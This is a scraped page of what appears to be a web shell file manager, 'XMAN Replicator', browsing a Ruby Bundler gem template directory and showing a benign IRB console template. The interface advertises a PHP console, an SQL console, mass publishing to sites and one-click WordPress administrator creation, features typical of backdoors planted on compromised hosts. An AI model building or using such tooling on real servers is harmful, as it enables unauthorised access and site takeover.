🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
ruby30
/
share
/
gems
/
gems
/
bundler-2.2.33
/
lib
/
bundler
/
templates
/
newgem
/
bin
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-07-23 05:01
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-07-23 05:01
🔄
🗑️
🗑️📁
⬇️
🔒
console.tt
403 B
-rw-r--r--
2024-06-26 13:55
✏️
🔄
🗑️
⬇️
🔒
setup.tt
131 B
-rw-r--r--
2024-06-26 13:55
✏️
🔄
🗑️
⬇️
🔒
Edit: console.tt
#!/opt/alt/ruby30/bin/ruby # frozen_string_literal: true require "bundler/setup" require "<%= config[:namespaced_path] %>" # You can add fixtures and/or initialization code here to make experimenting # with your gem easier. You can also use a different console, if you like. # (If you use this, don't forget to add pry to your Gemfile!) # require "pry" # Pry.start require "irb" IRB.start(__FILE__)
Save
PHP Console
Execute
SQL Console
Execute